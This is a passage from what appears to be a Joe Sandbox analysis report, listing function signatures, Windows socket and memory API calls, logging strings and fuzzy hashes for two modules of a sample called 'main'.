                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteshutdown
                                                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                                                    • API String ID: 2143829457-932964775
                                                                    • Opcode ID: 7957e1a164f942eee286496fe50f43704e342ae98909b51402a0abedeb623535
                                                                    • Instruction ID: 235941b6d674569a183340f88eecfbccac0222a4c43a48cedbdc5fee064c3e32
                                                                    • Opcode Fuzzy Hash: 7957e1a164f942eee286496fe50f43704e342ae98909b51402a0abedeb623535
                                                                    • Instruction Fuzzy Hash: 32F09065E0CC02D9E6505717EC454B81211AF307B0F4441B2D93C721B2EE1C99868308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastclosesocketfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                                                    • API String ID: 152032778-2221966578
                                                                    • Opcode ID: 8c2479271ebde7624cfa049f0fd4b269a3277dd3b9c28245840a48b3d178eb16
                                                                    • Instruction ID: 45d8649f41e5224a216d4ac9aa40f9e3e88eaadfe2f233530aec597b525a9325
                                                                    • Opcode Fuzzy Hash: 8c2479271ebde7624cfa049f0fd4b269a3277dd3b9c28245840a48b3d178eb16
                                                                    • Instruction Fuzzy Hash: 2CF05E58E08D07C9FA505BA7E8550B96220AF347B4F5413B2D53E762F7AE1CA58A8309
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSectionfclose
                                                                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                    • API String ID: 3387974148-4247581856
                                                                    • Opcode ID: b2d412c44e570df1dabc8f2e7e8fd3ffd28a8ae6c2bb712ee4117a751477ab3f
                                                                    • Instruction ID: 45a799861454babe650d6aeedb534beffe48cb7cd950cc2c6dca894fa030a84d
                                                                    • Opcode Fuzzy Hash: b2d412c44e570df1dabc8f2e7e8fd3ffd28a8ae6c2bb712ee4117a751477ab3f
                                                                    • Instruction Fuzzy Hash: E8F0A424A0AE42CCFA049B52E8A57793B60AF70364F5445B5C42D7A176CF7CA149878C
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 425540c05eb6a60fe69dc6db63991cc4a0214c7dbd5d9d62c1d2ec61040ccf1f
                                                                    • Instruction ID: 20a6b69da0a110726e50997fb6c54d56ad15d9f085be6e1817883876be2ba4b7
                                                                    • Opcode Fuzzy Hash: 425540c05eb6a60fe69dc6db63991cc4a0214c7dbd5d9d62c1d2ec61040ccf1f
                                                                    • Instruction Fuzzy Hash: 70F08156E0BE5182F7641FD3D8047782669BF88FE1F2840B8CE0D1B7799D2CA8068312
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,00007FFE11513964,?,?,00007FFE1150119E), ref: 00007FFE1150E887
                                                                    Strings
                                                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FFE1150E7B0
                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FFE1150E72D
                                                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFE1150E822
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                    • API String ID: 544645111-1286557213
                                                                    • Opcode ID: 4b2f20d95895ebfb49c3b06f6b12392f56a415d92b798b9bea8858d5e957f50b
                                                                    • Instruction ID: 1d30246ce6c8748e335536040ef9b94f4a68c9a8875a318bb049c4878b1c052f
                                                                    • Opcode Fuzzy Hash: 4b2f20d95895ebfb49c3b06f6b12392f56a415d92b798b9bea8858d5e957f50b
                                                                    • Instruction Fuzzy Hash: 25519D62F08E6285EB248BA7D94427C23A9EF40BB4F2481B9D91D477F9DE3CE581D700
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,00007FFE1330F044,?,?,00007FFE1330119E), ref: 00007FFE1330AD37
                                                                    Strings
                                                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FFE1330AC60
                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FFE1330ABDD
                                                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFE1330ACD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                    • API String ID: 544645111-1286557213
                                                                    • Opcode ID: 144d5e5b304bab7244275e38464320ad153038b33a392ceb6dd9dae6343fccf4
                                                                    • Instruction ID: 79c93584b81b4953deead28a473fbe244fbc77c711c3bf87e9affc92c482aa90
                                                                    • Opcode Fuzzy Hash: 144d5e5b304bab7244275e38464320ad153038b33a392ceb6dd9dae6343fccf4
                                                                    • Instruction Fuzzy Hash: 54517161B189468EFA108B1AE54077C2761AF64BB4F0482B5D93D677E9DE3CE5828708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                                                    • API String ID: 1729277954-536111009
                                                                    • Opcode ID: 165cd1ca86b32e639d495e5289d91cf5dcf8076240978b24a20d2f6bd5de3276
                                                                    • Instruction ID: 3d9ffdd557661797fb76136b962e873e2f976de1e99d3e60a3c17eaf645309a9
                                                                    • Opcode Fuzzy Hash: 165cd1ca86b32e639d495e5289d91cf5dcf8076240978b24a20d2f6bd5de3276
                                                                    • Instruction Fuzzy Hash: D5F0B461B189468EF3209B57B800469A660FFA87B0F508275ED7DA37B5DF7CD90A8B04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection
                                                                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                    • API String ID: 166494926-4247581856
                                                                    • Opcode ID: e16006ad1eebfa94513ddb4bd1208f827e843172f43d439b0ae009f34803d196
                                                                    • Instruction ID: 4a5d84c61deff183053eea772f72e1f78d47ad870a396d3982c46ad3a2f048a4
                                                                    • Opcode Fuzzy Hash: e16006ad1eebfa94513ddb4bd1208f827e843172f43d439b0ae009f34803d196
                                                                    • Instruction Fuzzy Hash: BBF03A24E4AE4380FB02EB53E898379376E6F41364F8410B9C40D06271CF7CA449C341
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandleLastModule
                                                                    • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                    • API String ID: 4242514867-2427012484
                                                                    • Opcode ID: de8f622d8abfe16151a34b6b50d39ef6d00e3aaf6a7b449b9ac6f40651020029
                                                                    • Instruction ID: 7aa8b20fc8bca05de7feb5d05e05964c70c61aafaedb1e709a0d5896e3c045d3
                                                                    • Opcode Fuzzy Hash: de8f622d8abfe16151a34b6b50d39ef6d00e3aaf6a7b449b9ac6f40651020029
                                                                    • Instruction Fuzzy Hash: 5AF03021B28E03C0E7209B52E84036E3B6AFB55368FC401B5C54D42674DF7CD119C741
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandleLastModule
                                                                    • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                    • API String ID: 4242514867-2427012484
                                                                    • Opcode ID: dc740bd38e7be61ee9de713c700e00f2c4b8b94f34ca0cffaf1a8ca8de9b2ef5
                                                                    • Instruction ID: d82668dfd4fb545c2ef8de328de60c9237ab7e66ba35ceb06ae5774dace40d5f
                                                                    • Opcode Fuzzy Hash: dc740bd38e7be61ee9de713c700e00f2c4b8b94f34ca0cffaf1a8ca8de9b2ef5
                                                                    • Instruction Fuzzy Hash: 26F06520A0CE02C4F7259B12E8403AE2761FF647B8F8401B2C56D226B5CF3CD249C708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Cleanupfflushfwrite
                                                                    • String ID: Done$[I] (%s) -> %s$net_cleanup
                                                                    • API String ID: 1441811225-3926276259
                                                                    • Opcode ID: a12471e7995a5cf6f2fbd275d2e1fb1049ad2213750b30cc07cf48e9de6b368c
                                                                    • Instruction ID: 23838a873932824f503141621341a200bff880dcf050b138e27fd2158dcf4c82
                                                                    • Opcode Fuzzy Hash: a12471e7995a5cf6f2fbd275d2e1fb1049ad2213750b30cc07cf48e9de6b368c
                                                                    • Instruction Fuzzy Hash: 5DD01261E4BD07D1EB056757DC850B9272BAF50374FE060F1C10D010309F2CA14BC301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Cleanupfflushfwrite
                                                                    • String ID: Done$[I] (%s) -> %s$net_cleanup
                                                                    • API String ID: 1441811225-3926276259
                                                                    • Opcode ID: 04378ce227c48fd8509de74ca1f8afee5d89b1fff0da950f5c4465d2b4b82116
                                                                    • Instruction ID: 4024b4aabfd88925fe975af76ea1e23cfbfce689748afeb5847ec790cf3d5e42
                                                                    • Opcode Fuzzy Hash: 04378ce227c48fd8509de74ca1f8afee5d89b1fff0da950f5c4465d2b4b82116
                                                                    • Instruction Fuzzy Hash: 85D0C961E4DD07D8EA04AB12EC460A45360AF74325F9050B2C02C611379E6CA15AC788
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Byte$CharMultiWide$Lead_errno
                                                                    • String ID:
                                                                    • API String ID: 2766522060-0
                                                                    • Opcode ID: e51ed71a1184e0be453004719148579e0cf7ea03b994c715d1ac3cde1f9619a6
                                                                    • Instruction ID: 80d84e651777772efb74b7a07583b7126540c1d2876c382134958351f690a143
                                                                    • Opcode Fuzzy Hash: e51ed71a1184e0be453004719148579e0cf7ea03b994c715d1ac3cde1f9619a6
                                                                    • Instruction Fuzzy Hash: 4931F8B2A0CA818AF7324F22A4407797AAAEF857E4F244175EA8D477F5DB7CD541CB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Byte$CharMultiWide$Lead_errno
                                                                    • String ID:
                                                                    • API String ID: 2766522060-0
                                                                    • Opcode ID: a871b509cd8551db4e03bbfc493d5aa71d0119820ce4453e9fe1b48a24f38926
                                                                    • Instruction ID: a5f92e839e24eca710ed5c3755335b157961e2cb12cddafa9785068a4d2d77cf
                                                                    • Opcode Fuzzy Hash: a871b509cd8551db4e03bbfc493d5aa71d0119820ce4453e9fe1b48a24f38926
                                                                    • Instruction Fuzzy Hash: CE31C472B0CE828EF7B04F22A40037D6A90BBA57A4F044175EAEC637E5DB3CD4458719
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _unlock$_lockrealloc
                                                                    • String ID:
                                                                    • API String ID: 4047297157-0
                                                                    • Opcode ID: afaa89eb9a781e74ef3867d866e68d3e9eb0bc36328b9edcdded064e7ff3b20a
                                                                    • Instruction ID: c5775a7bcaddacfeaa0c5e6a023598c27005c0d38ae8480cf0fd226920571b67
                                                                    • Opcode Fuzzy Hash: afaa89eb9a781e74ef3867d866e68d3e9eb0bc36328b9edcdded064e7ff3b20a
                                                                    • Instruction Fuzzy Hash: 26116DA2A05F4185EB475B22D8503BD229AAF44BE4F288174DA4D0B3E9EF3CE8958310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _unlock$_lockrealloc
                                                                    • String ID:
                                                                    • API String ID: 4047297157-0
                                                                    • Opcode ID: 457591d8302be84774bad6e7394aed3a9deb09f1d721730b27b08a00734e280f
                                                                    • Instruction ID: 967e38dc0aab9b21ea3079edcbb0f7f9e1cb7df2ea105c215584a82373cfa94e
                                                                    • Opcode Fuzzy Hash: 457591d8302be84774bad6e7394aed3a9deb09f1d721730b27b08a00734e280f
                                                                    • Instruction Fuzzy Hash: 0011E262B0AF0188FB456F22E8503BC2295EF64FA4F08C570DA6D1B3D5EE3CE8518364
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                                                    • API String ID: 1617791916-3920367287
                                                                    • Opcode ID: 8df1f24abc851b79ec92a57fabfe05ed8a9e094508eb1567fe60d01fe4915a01
                                                                    • Instruction ID: 8dd4c622e117e7dafb6e9ced01be1e3e8a8c6582806aab78603818e571cb894f
                                                                    • Opcode Fuzzy Hash: 8df1f24abc851b79ec92a57fabfe05ed8a9e094508eb1567fe60d01fe4915a01
                                                                    • Instruction Fuzzy Hash: 51018651F4AE4789FB615B9B9840679164A6F84BE1F5C40B8CD0D073B5EE2CB9454200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
